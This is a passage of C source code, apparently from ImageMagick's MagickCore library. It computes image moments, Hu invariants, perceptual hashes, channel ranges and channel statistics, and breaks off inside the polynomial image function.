M20[CompositeChannels]+=M20[IndexChannel];
M21[CompositeChannels]+=M21[IndexChannel];
M22[CompositeChannels]+=M22[IndexChannel];
M30[CompositeChannels]+=M30[IndexChannel];
}
M00[CompositeChannels]/=(double) channels;
M01[CompositeChannels]/=(double) channels;
M02[CompositeChannels]/=(double) channels;
M03[CompositeChannels]/=(double) channels;
M10[CompositeChannels]/=(double) channels;
M11[CompositeChannels]/=(double) channels;
M12[CompositeChannels]/=(double) channels;
M20[CompositeChannels]/=(double) channels;
M21[CompositeChannels]/=(double) channels;
M22[CompositeChannels]/=(double) channels;
M30[CompositeChannels]/=(double) channels;
for (channel=0; channel <= CompositeChannels; channel++)
{
/*
Compute elliptical angle, major and minor axes, eccentricity, & intensity.
*/
channel_moments[channel].centroid=centroid[channel];
channel_moments[channel].ellipse_axis.x=sqrt((2.0/M00[channel])*
((M20[channel]+M02[channel])+sqrt(4.0*M11[channel]*M11[channel]+
(M20[channel]-M02[channel])*(M20[channel]-M02[channel]))));
channel_moments[channel].ellipse_axis.y=sqrt((2.0/M00[channel])*
((M20[channel]+M02[channel])-sqrt(4.0*M11[channel]*M11[channel]+
(M20[channel]-M02[channel])*(M20[channel]-M02[channel]))));
channel_moments[channel].ellipse_angle=RadiansToDegrees(0.5*atan(2.0*
M11[channel]/(M20[channel]-M02[channel]+MagickEpsilon)));
if (fabs(M11[channel]) < MagickEpsilon)
{
if (fabs(M20[channel]-M02[channel]) < MagickEpsilon)
channel_moments[channel].ellipse_angle+=0.0;
else
if ((M20[channel]-M02[channel]) < 0.0)
channel_moments[channel].ellipse_angle+=90.0;
else
channel_moments[channel].ellipse_angle+=0.0;
}
else
if (M11[channel] < 0.0)
{
if (fabs(M20[channel]-M02[channel]) < MagickEpsilon)
channel_moments[channel].ellipse_angle+=0.0;
else
if ((M20[channel]-M02[channel]) < 0.0)
channel_moments[channel].ellipse_angle+=90.0;
else
channel_moments[channel].ellipse_angle+=180.0;
}
else
{
if (fabs(M20[channel]-M02[channel]) < MagickEpsilon)
channel_moments[channel].ellipse_angle+=0.0;
else
if ((M20[channel]-M02[channel]) < 0.0)
channel_moments[channel].ellipse_angle+=90.0;
else
channel_moments[channel].ellipse_angle+=0.0;
}
channel_moments[channel].ellipse_eccentricity=sqrt(1.0-(
channel_moments[channel].ellipse_axis.y/
(channel_moments[channel].ellipse_axis.x+MagickEpsilon)));
channel_moments[channel].ellipse_intensity=M00[channel]/
(MagickPI*channel_moments[channel].ellipse_axis.x*
channel_moments[channel].ellipse_axis.y+MagickEpsilon);
}
for (channel=0; channel <= CompositeChannels; channel++)
{
/*
Normalize image moments.
*/
M10[channel]=0.0;
M01[channel]=0.0;
M11[channel]/=pow(M00[channel],1.0+(1.0+1.0)/2.0);
M20[channel]/=pow(M00[channel],1.0+(2.0+0.0)/2.0);
M02[channel]/=pow(M00[channel],1.0+(0.0+2.0)/2.0);
M21[channel]/=pow(M00[channel],1.0+(2.0+1.0)/2.0);
M12[channel]/=pow(M00[channel],1.0+(1.0+2.0)/2.0);
M22[channel]/=pow(M00[channel],1.0+(2.0+2.0)/2.0);
M30[channel]/=pow(M00[channel],1.0+(3.0+0.0)/2.0);
M03[channel]/=pow(M00[channel],1.0+(0.0+3.0)/2.0);
M00[channel]=1.0;
}
for (channel=0; channel <= CompositeChannels; channel++)
{
/*
Compute Hu invariant moments.
*/
channel_moments[channel].I[0]=M20[channel]+M02[channel];
channel_moments[channel].I[1]=(M20[channel]-M02[channel])*
(M20[channel]-M02[channel])+4.0*M11[channel]*M11[channel];
channel_moments[channel].I[2]=(M30[channel]-3.0*M12[channel])*
(M30[channel]-3.0*M12[channel])+(3.0*M21[channel]-M03[channel])*
(3.0*M21[channel]-M03[channel]);
channel_moments[channel].I[3]=(M30[channel]+M12[channel])*
(M30[channel]+M12[channel])+(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]);
channel_moments[channel].I[4]=(M30[channel]-3.0*M12[channel])*
(M30[channel]+M12[channel])*((M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-3.0*(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]))+(3.0*M21[channel]-M03[channel])*
(M21[channel]+M03[channel])*(3.0*(M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]));
channel_moments[channel].I[5]=(M20[channel]-M02[channel])*
((M30[channel]+M12[channel])*(M30[channel]+M12[channel])-
(M21[channel]+M03[channel])*(M21[channel]+M03[channel]))+
4.0*M11[channel]*(M30[channel]+M12[channel])*(M21[channel]+M03[channel]);
channel_moments[channel].I[6]=(3.0*M21[channel]-M03[channel])*
(M30[channel]+M12[channel])*((M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-3.0*(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]))-(M30[channel]-3*M12[channel])*
(M21[channel]+M03[channel])*(3.0*(M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-(M21[channel]+M03[channel])*
(M21[channel]+M03[channel]));
channel_moments[channel].I[7]=M11[channel]*((M30[channel]+M12[channel])*
(M30[channel]+M12[channel])-(M03[channel]+M21[channel])*
(M03[channel]+M21[channel]))-(M20[channel]-M02[channel])*
(M30[channel]+M12[channel])*(M03[channel]+M21[channel]);
}
if (y < (ssize_t) image->rows)
channel_moments=(ChannelMoments *) RelinquishMagickMemory(channel_moments);
return(channel_moments);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l P e r c e p t u a l H a s h %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelPerceptualHash() returns the perceptual hash of one or more
% image channels.
%
% The format of the GetImageChannelPerceptualHash method is:
%
% ChannelPerceptualHash *GetImageChannelPerceptualHash(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
static inline double MagickLog10(const double x)
{
#define Log10Epsilon (1.0e-11)
if (fabs(x) < Log10Epsilon)
return(log10(Log10Epsilon));
return(log10(fabs(x)));
}
MagickExport ChannelPerceptualHash *GetImageChannelPerceptualHash(
const Image *image,ExceptionInfo *exception)
{
ChannelMoments
*moments;
ChannelPerceptualHash
*perceptual_hash;
Image
*hash_image;
MagickBooleanType
status;
register ssize_t
i;
ssize_t
channel;
/*
Blur then transform to sRGB colorspace.
*/
hash_image=BlurImage(image,0.0,1.0,exception);
if (hash_image == (Image *) NULL)
return((ChannelPerceptualHash *) NULL);
hash_image->depth=8;
status=TransformImageColorspace(hash_image,sRGBColorspace);
if (status == MagickFalse)
return((ChannelPerceptualHash *) NULL);
moments=GetImageChannelMoments(hash_image,exception);
hash_image=DestroyImage(hash_image);
if (moments == (ChannelMoments *) NULL)
return((ChannelPerceptualHash *) NULL);
perceptual_hash=(ChannelPerceptualHash *) AcquireQuantumMemory(
CompositeChannels+1UL,sizeof(*perceptual_hash));
if (perceptual_hash == (ChannelPerceptualHash *) NULL)
return((ChannelPerceptualHash *) NULL);
for (channel=0; channel <= CompositeChannels; channel++)
for (i=0; i < MaximumNumberOfImageMoments; i++)
perceptual_hash[channel].P[i]=(-MagickLog10(moments[channel].I[i]));
moments=(ChannelMoments *) RelinquishMagickMemory(moments);
/*
Blur then transform to HCLp colorspace.
*/
hash_image=BlurImage(image,0.0,1.0,exception);
if (hash_image == (Image *) NULL)
{
perceptual_hash=(ChannelPerceptualHash *) RelinquishMagickMemory(
perceptual_hash);
return((ChannelPerceptualHash *) NULL);
}
hash_image->depth=8;
status=TransformImageColorspace(hash_image,HCLpColorspace);
if (status == MagickFalse)
{
perceptual_hash=(ChannelPerceptualHash *) RelinquishMagickMemory(
perceptual_hash);
return((ChannelPerceptualHash *) NULL);
}
moments=GetImageChannelMoments(hash_image,exception);
hash_image=DestroyImage(hash_image);
if (moments == (ChannelMoments *) NULL)
{
perceptual_hash=(ChannelPerceptualHash *) RelinquishMagickMemory(
perceptual_hash);
return((ChannelPerceptualHash *) NULL);
}
for (channel=0; channel <= CompositeChannels; channel++)
for (i=0; i < MaximumNumberOfImageMoments; i++)
perceptual_hash[channel].Q[i]=(-MagickLog10(moments[channel].I[i]));
moments=(ChannelMoments *) RelinquishMagickMemory(moments);
return(perceptual_hash);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l R a n g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelRange() returns the range of one or more image channels.
%
% The format of the GetImageChannelRange method is:
%
% MagickBooleanType GetImageChannelRange(const Image *image,
% const ChannelType channel,double *minima,double *maxima,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o minima: the minimum value in the channel.
%
% o maxima: the maximum value in the channel.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType GetImageRange(const Image *image,
double *minima,double *maxima,ExceptionInfo *exception)
{
return(GetImageChannelRange(image,CompositeChannels,minima,maxima,exception));
}
MagickExport MagickBooleanType GetImageChannelRange(const Image *image,
const ChannelType channel,double *minima,double *maxima,
ExceptionInfo *exception)
{
MagickPixelPacket
pixel;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
*maxima=(-MagickMaximumValue);
*minima=MagickMaximumValue;
GetMagickPixelPacket(image,&pixel);
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; x++)
{
SetMagickPixelPacket(image,p,indexes+x,&pixel);
if ((channel & RedChannel) != 0)
{
if (pixel.red < *minima)
*minima=(double) pixel.red;
if (pixel.red > *maxima)
*maxima=(double) pixel.red;
}
if ((channel & GreenChannel) != 0)
{
if (pixel.green < *minima)
*minima=(double) pixel.green;
if (pixel.green > *maxima)
*maxima=(double) pixel.green;
}
if ((channel & BlueChannel) != 0)
{
if (pixel.blue < *minima)
*minima=(double) pixel.blue;
if (pixel.blue > *maxima)
*maxima=(double) pixel.blue;
}
if (((channel & OpacityChannel) != 0) && (image->matte != MagickFalse))
{
if ((QuantumRange-pixel.opacity) < *minima)
*minima=(double) (QuantumRange-pixel.opacity);
if ((QuantumRange-pixel.opacity) > *maxima)
*maxima=(double) (QuantumRange-pixel.opacity);
}
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
{
if ((double) pixel.index < *minima)
*minima=(double) pixel.index;
if ((double) pixel.index > *maxima)
*maxima=(double) pixel.index;
}
p++;
}
}
return(y == (ssize_t) image->rows ? MagickTrue : MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e C h a n n e l S t a t i s t i c s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageChannelStatistics() returns statistics for each channel in the
% image. The statistics include the channel depth, its minima, maxima, mean,
% standard deviation, kurtosis and skewness. You can access the red channel
% mean, for example, like this:
%
% channel_statistics=GetImageChannelStatistics(image,exception);
% red_mean=channel_statistics[RedChannel].mean;
%
% Use MagickRelinquishMemory() to free the statistics buffer.
%
% The format of the GetImageChannelStatistics method is:
%
% ChannelStatistics *GetImageChannelStatistics(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport ChannelStatistics *GetImageChannelStatistics(const Image *image,
ExceptionInfo *exception)
{
ChannelStatistics
*channel_statistics;
double
area,
standard_deviation;
MagickPixelPacket
number_bins,
*histogram;
QuantumAny
range;
register ssize_t
i;
size_t
channels,
depth,
length;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
length=CompositeChannels+1UL;
channel_statistics=(ChannelStatistics *) AcquireQuantumMemory(length,
sizeof(*channel_statistics));
histogram=(MagickPixelPacket *) AcquireQuantumMemory(MaxMap+1U,
sizeof(*histogram));
if ((channel_statistics == (ChannelStatistics *) NULL) ||
(histogram == (MagickPixelPacket *) NULL))
{
if (histogram != (MagickPixelPacket *) NULL)
histogram=(MagickPixelPacket *) RelinquishMagickMemory(histogram);
if (channel_statistics != (ChannelStatistics *) NULL)
channel_statistics=(ChannelStatistics *) RelinquishMagickMemory(
channel_statistics);
return(channel_statistics);
}
(void) memset(channel_statistics,0,length*
sizeof(*channel_statistics));
for (i=0; i <= (ssize_t) CompositeChannels; i++)
{
channel_statistics[i].depth=1;
channel_statistics[i].maxima=(-MagickMaximumValue);
channel_statistics[i].minima=MagickMaximumValue;
}
(void) memset(histogram,0,(MaxMap+1U)*sizeof(*histogram));
(void) memset(&number_bins,0,sizeof(number_bins));
for (y=0; y < (ssize_t) image->rows; y++)
{
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register ssize_t
x;
/*
Compute pixel statistics.
*/
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
break;
indexes=GetVirtualIndexQueue(image);
for (x=0; x < (ssize_t) image->columns; )
{
if (channel_statistics[RedChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[RedChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelRed(p),range) == MagickFalse)
{
channel_statistics[RedChannel].depth++;
continue;
}
}
if (channel_statistics[GreenChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[GreenChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelGreen(p),range) == MagickFalse)
{
channel_statistics[GreenChannel].depth++;
continue;
}
}
if (channel_statistics[BlueChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[BlueChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelBlue(p),range) == MagickFalse)
{
channel_statistics[BlueChannel].depth++;
continue;
}
}
if (image->matte != MagickFalse)
{
if (channel_statistics[OpacityChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[OpacityChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelAlpha(p),range) == MagickFalse)
{
channel_statistics[OpacityChannel].depth++;
continue;
}
}
}
if (image->colorspace == CMYKColorspace)
{
if (channel_statistics[BlackChannel].depth != MAGICKCORE_QUANTUM_DEPTH)
{
depth=channel_statistics[BlackChannel].depth;
range=GetQuantumRange(depth);
if (IsPixelAtDepth(GetPixelIndex(indexes+x),range) == MagickFalse)
{
channel_statistics[BlackChannel].depth++;
continue;
}
}
}
if ((double) GetPixelRed(p) < channel_statistics[RedChannel].minima)
channel_statistics[RedChannel].minima=(double) GetPixelRed(p);
if ((double) GetPixelRed(p) > channel_statistics[RedChannel].maxima)
channel_statistics[RedChannel].maxima=(double) GetPixelRed(p);
channel_statistics[RedChannel].sum+=GetPixelRed(p);
channel_statistics[RedChannel].sum_squared+=(double) GetPixelRed(p)*
GetPixelRed(p);
channel_statistics[RedChannel].sum_cubed+=(double)
GetPixelRed(p)*GetPixelRed(p)*GetPixelRed(p);
channel_statistics[RedChannel].sum_fourth_power+=(double)
GetPixelRed(p)*GetPixelRed(p)*GetPixelRed(p)*GetPixelRed(p);
if ((double) GetPixelGreen(p) < channel_statistics[GreenChannel].minima)
channel_statistics[GreenChannel].minima=(double) GetPixelGreen(p);
if ((double) GetPixelGreen(p) > channel_statistics[GreenChannel].maxima)
channel_statistics[GreenChannel].maxima=(double) GetPixelGreen(p);
channel_statistics[GreenChannel].sum+=GetPixelGreen(p);
channel_statistics[GreenChannel].sum_squared+=(double) GetPixelGreen(p)*
GetPixelGreen(p);
channel_statistics[GreenChannel].sum_cubed+=(double) GetPixelGreen(p)*
GetPixelGreen(p)*GetPixelGreen(p);
channel_statistics[GreenChannel].sum_fourth_power+=(double)
GetPixelGreen(p)*GetPixelGreen(p)*GetPixelGreen(p)*GetPixelGreen(p);
if ((double) GetPixelBlue(p) < channel_statistics[BlueChannel].minima)
channel_statistics[BlueChannel].minima=(double) GetPixelBlue(p);
if ((double) GetPixelBlue(p) > channel_statistics[BlueChannel].maxima)
channel_statistics[BlueChannel].maxima=(double) GetPixelBlue(p);
channel_statistics[BlueChannel].sum+=GetPixelBlue(p);
channel_statistics[BlueChannel].sum_squared+=(double) GetPixelBlue(p)*
GetPixelBlue(p);
channel_statistics[BlueChannel].sum_cubed+=(double) GetPixelBlue(p)*
GetPixelBlue(p)*GetPixelBlue(p);
channel_statistics[BlueChannel].sum_fourth_power+=(double)
GetPixelBlue(p)*GetPixelBlue(p)*GetPixelBlue(p)*GetPixelBlue(p);
histogram[ScaleQuantumToMap(GetPixelRed(p))].red++;
histogram[ScaleQuantumToMap(GetPixelGreen(p))].green++;
histogram[ScaleQuantumToMap(GetPixelBlue(p))].blue++;
if (image->matte != MagickFalse)
{
if ((double) GetPixelAlpha(p) < channel_statistics[OpacityChannel].minima)
channel_statistics[OpacityChannel].minima=(double) GetPixelAlpha(p);
if ((double) GetPixelAlpha(p) > channel_statistics[OpacityChannel].maxima)
channel_statistics[OpacityChannel].maxima=(double) GetPixelAlpha(p);
channel_statistics[OpacityChannel].sum+=GetPixelAlpha(p);
channel_statistics[OpacityChannel].sum_squared+=(double)
GetPixelAlpha(p)*GetPixelAlpha(p);
channel_statistics[OpacityChannel].sum_cubed+=(double)
GetPixelAlpha(p)*GetPixelAlpha(p)*GetPixelAlpha(p);
channel_statistics[OpacityChannel].sum_fourth_power+=(double)
GetPixelAlpha(p)*GetPixelAlpha(p)*GetPixelAlpha(p)*GetPixelAlpha(p);
histogram[ScaleQuantumToMap(GetPixelAlpha(p))].opacity++;
}
if (image->colorspace == CMYKColorspace)
{
if ((double) GetPixelIndex(indexes+x) < channel_statistics[BlackChannel].minima)
channel_statistics[BlackChannel].minima=(double)
GetPixelIndex(indexes+x);
if ((double) GetPixelIndex(indexes+x) > channel_statistics[BlackChannel].maxima)
channel_statistics[BlackChannel].maxima=(double)
GetPixelIndex(indexes+x);
channel_statistics[BlackChannel].sum+=GetPixelIndex(indexes+x);
channel_statistics[BlackChannel].sum_squared+=(double)
GetPixelIndex(indexes+x)*GetPixelIndex(indexes+x);
channel_statistics[BlackChannel].sum_cubed+=(double)
GetPixelIndex(indexes+x)*GetPixelIndex(indexes+x)*
GetPixelIndex(indexes+x);
channel_statistics[BlackChannel].sum_fourth_power+=(double)
GetPixelIndex(indexes+x)*GetPixelIndex(indexes+x)*
GetPixelIndex(indexes+x)*GetPixelIndex(indexes+x);
histogram[ScaleQuantumToMap(GetPixelIndex(indexes+x))].index++;
}
x++;
p++;
}
}
for (i=0; i < (ssize_t) CompositeChannels; i++)
{
double
area,
mean,
standard_deviation;
/*
Normalize pixel statistics.
*/
area=PerceptibleReciprocal((double) image->columns*image->rows);
mean=channel_statistics[i].sum*area;
channel_statistics[i].sum=mean;
channel_statistics[i].sum_squared*=area;
channel_statistics[i].sum_cubed*=area;
channel_statistics[i].sum_fourth_power*=area;
channel_statistics[i].mean=mean;
channel_statistics[i].variance=channel_statistics[i].sum_squared;
standard_deviation=sqrt(channel_statistics[i].variance-(mean*mean));
area=PerceptibleReciprocal((double) image->columns*image->rows-1.0)*
((double) image->columns*image->rows);
standard_deviation=sqrt(area*standard_deviation*standard_deviation);
channel_statistics[i].standard_deviation=standard_deviation;
}
for (i=0; i < (ssize_t) (MaxMap+1U); i++)
{
if (histogram[i].red > 0.0)
number_bins.red++;
if (histogram[i].green > 0.0)
number_bins.green++;
if (histogram[i].blue > 0.0)
number_bins.blue++;
if ((image->matte != MagickFalse) && (histogram[i].opacity > 0.0))
number_bins.opacity++;
if ((image->colorspace == CMYKColorspace) && (histogram[i].index > 0.0))
number_bins.index++;
}
area=PerceptibleReciprocal((double) image->columns*image->rows);
for (i=0; i < (ssize_t) (MaxMap+1U); i++)
{
/*
Compute pixel entropy.
*/
histogram[i].red*=area;
channel_statistics[RedChannel].entropy+=-histogram[i].red*
MagickLog10(histogram[i].red)*
PerceptibleReciprocal(MagickLog10((double) number_bins.red));
histogram[i].green*=area;
channel_statistics[GreenChannel].entropy+=-histogram[i].green*
MagickLog10(histogram[i].green)*
PerceptibleReciprocal(MagickLog10((double) number_bins.green));
histogram[i].blue*=area;
channel_statistics[BlueChannel].entropy+=-histogram[i].blue*
MagickLog10(histogram[i].blue)*
PerceptibleReciprocal(MagickLog10((double) number_bins.blue));
if (image->matte != MagickFalse)
{
histogram[i].opacity*=area;
channel_statistics[OpacityChannel].entropy+=-histogram[i].opacity*
MagickLog10(histogram[i].opacity)*
PerceptibleReciprocal(MagickLog10((double) number_bins.opacity));
}
if (image->colorspace == CMYKColorspace)
{
histogram[i].index*=area;
channel_statistics[IndexChannel].entropy+=-histogram[i].index*
MagickLog10(histogram[i].index)*
PerceptibleReciprocal(MagickLog10((double) number_bins.index));
}
}
/*
Compute overall statistics.
*/
for (i=0; i < (ssize_t) CompositeChannels; i++)
{
channel_statistics[CompositeChannels].depth=(size_t) EvaluateMax((double)
channel_statistics[CompositeChannels].depth,(double)
channel_statistics[i].depth);
channel_statistics[CompositeChannels].minima=MagickMin(
channel_statistics[CompositeChannels].minima,
channel_statistics[i].minima);
channel_statistics[CompositeChannels].maxima=EvaluateMax(
channel_statistics[CompositeChannels].maxima,
channel_statistics[i].maxima);
channel_statistics[CompositeChannels].sum+=channel_statistics[i].sum;
channel_statistics[CompositeChannels].sum_squared+=
channel_statistics[i].sum_squared;
channel_statistics[CompositeChannels].sum_cubed+=
channel_statistics[i].sum_cubed;
channel_statistics[CompositeChannels].sum_fourth_power+=
channel_statistics[i].sum_fourth_power;
channel_statistics[CompositeChannels].mean+=channel_statistics[i].mean;
channel_statistics[CompositeChannels].variance+=
channel_statistics[i].variance-channel_statistics[i].mean*
channel_statistics[i].mean;
standard_deviation=sqrt(channel_statistics[i].variance-
(channel_statistics[i].mean*channel_statistics[i].mean));
area=PerceptibleReciprocal((double) image->columns*image->rows-1.0)*
((double) image->columns*image->rows);
standard_deviation=sqrt(area*standard_deviation*standard_deviation);
channel_statistics[CompositeChannels].standard_deviation=standard_deviation;
channel_statistics[CompositeChannels].entropy+=
channel_statistics[i].entropy;
}
channels=3;
if (image->matte != MagickFalse)
channels++;
if (image->colorspace == CMYKColorspace)
channels++;
channel_statistics[CompositeChannels].sum/=channels;
channel_statistics[CompositeChannels].sum_squared/=channels;
channel_statistics[CompositeChannels].sum_cubed/=channels;
channel_statistics[CompositeChannels].sum_fourth_power/=channels;
channel_statistics[CompositeChannels].mean/=channels;
channel_statistics[CompositeChannels].kurtosis/=channels;
channel_statistics[CompositeChannels].skewness/=channels;
channel_statistics[CompositeChannels].entropy/=channels;
i=CompositeChannels;
area=PerceptibleReciprocal((double) channels*image->columns*image->rows);
channel_statistics[i].variance=channel_statistics[i].sum_squared;
channel_statistics[i].mean=channel_statistics[i].sum;
standard_deviation=sqrt(channel_statistics[i].variance-
(channel_statistics[i].mean*channel_statistics[i].mean));
standard_deviation=sqrt(PerceptibleReciprocal((double) channels*
image->columns*image->rows-1.0)*channels*image->columns*image->rows*
standard_deviation*standard_deviation);
channel_statistics[i].standard_deviation=standard_deviation;
for (i=0; i <= (ssize_t) CompositeChannels; i++)
{
/*
Compute kurtosis & skewness statistics.
*/
standard_deviation=PerceptibleReciprocal(
channel_statistics[i].standard_deviation);
channel_statistics[i].skewness=(channel_statistics[i].sum_cubed-3.0*
channel_statistics[i].mean*channel_statistics[i].sum_squared+2.0*
channel_statistics[i].mean*channel_statistics[i].mean*
channel_statistics[i].mean)*(standard_deviation*standard_deviation*
standard_deviation);
channel_statistics[i].kurtosis=(channel_statistics[i].sum_fourth_power-4.0*
channel_statistics[i].mean*channel_statistics[i].sum_cubed+6.0*
channel_statistics[i].mean*channel_statistics[i].mean*
channel_statistics[i].sum_squared-3.0*channel_statistics[i].mean*
channel_statistics[i].mean*1.0*channel_statistics[i].mean*
channel_statistics[i].mean)*(standard_deviation*standard_deviation*
standard_deviation*standard_deviation)-3.0;
}
channel_statistics[CompositeChannels].mean=0.0;
channel_statistics[CompositeChannels].standard_deviation=0.0;
for (i=0; i < (ssize_t) CompositeChannels; i++)
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[i].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[i].standard_deviation;
}
channel_statistics[CompositeChannels].mean/=(double) channels;
channel_statistics[CompositeChannels].standard_deviation/=(double) channels;
histogram=(MagickPixelPacket *) RelinquishMagickMemory(histogram);
if (y < (ssize_t) image->rows)
channel_statistics=(ChannelStatistics *) RelinquishMagickMemory(
channel_statistics);
return(channel_statistics);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% P o l y n o m i a l I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% PolynomialImage() returns a new image where each pixel is the sum of the
% pixels in the image sequence after applying its corresponding terms
% (coefficient and degree pairs).
%
% The format of the PolynomialImage method is:
%
% Image *PolynomialImage(const Image *images,const size_t number_terms,
% const double *terms,ExceptionInfo *exception)
% Image *PolynomialImageChannel(const Image *images,
% const size_t number_terms,const ChannelType channel,
% const double *terms,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o images: the image sequence.
%
% o channel: the channel.
%
% o number_terms: the number of terms in the list. The actual list length
% is 2 x number_terms + 1 (the constant).
%
% o terms: the list of polynomial coefficients and degree pairs and a
% constant.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport Image *PolynomialImage(const Image *images,
const size_t number_terms,const double *terms,ExceptionInfo *exception)
{
Image
*polynomial_image;
polynomial_image=PolynomialImageChannel(images,DefaultChannels,number_terms,
terms,exception);
return(polynomial_image);
}
MagickExport Image *PolynomialImageChannel(const Image *images,
const ChannelType channel,const size_t number_terms,const double *terms,
ExceptionInfo *exception)
{
#define PolynomialImageTag "Polynomial/Image"
CacheView
*polynomial_view;
Image
*image;
MagickBooleanType
status;
MagickOffsetType
progress;
MagickPixelPacket
**magick_restrict polynomial_pixels,
zero;
ssize_t
y;
assert(images != (Image *) NULL);
assert(images->signature == MagickCoreSignature);
if (images->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",images->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImageCanvas(images,exception);
if (image == (Image *) NULL)
return((Image *) NULL);
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
InheritException(exception,&image->exception);
image=DestroyImage(image);
return((Image *) NULL);
}
polynomial_pixels=AcquirePixelThreadSet(images);
if (polynomial_pixels == (MagickPixelPacket **) NULL)
{
image=DestroyImage(image);
(void) ThrowMagickException(exception,GetMagickModule(),
ResourceLimitError,"MemoryAllocationFailed","`%s'",images->filename);
return((Image *) NULL);
}
/*
Polynomial image pixels.
*/
status=MagickTrue;
progress=0;
GetMagickPixelPacket(images,&zero);
polynomial_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
CacheView
*image_view;
const Image
*next;
const int
id = GetOpenMPThreadId();
register IndexPacket
*magick_restrict polynomial_indexes;
register MagickPixelPacket
*polynomial_pixel;
register PixelPacket
*magick_restrict q;
register ssize_t
i,
x;
size_t
number_images;
if (status == MagickFalse)
continue;
q=QueueCacheViewAuthenticPixels(polynomial_view,0,y,image->columns,1,
exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
polynomial_indexes=GetCacheViewAuthenticIndexQueue(polynomial_view);
polynomial_pixel=polynomial_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
polynomial_pixel[x]=zero;
next=images;
number_images=GetImageListLength(images);
for (i=0; i < (ssize_t) number_images; i++)
{
register const IndexPacket
*indexes;
register const PixelPacket
*p;
if (i >= (ssize_t) number_terms)
break;
image_view=AcquireVirtualCacheView(next,exception);
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
{
image_view=DestroyCacheView(image_view);
break;
}
indexes=GetCacheViewVirtualIndexQueue(image_view);
for (x=0; x < (ssize_t) image->columns; x++)
{
double
coefficient,
degree;
coefficient=terms[i << 1];
degree=terms[(i << 1)+1];
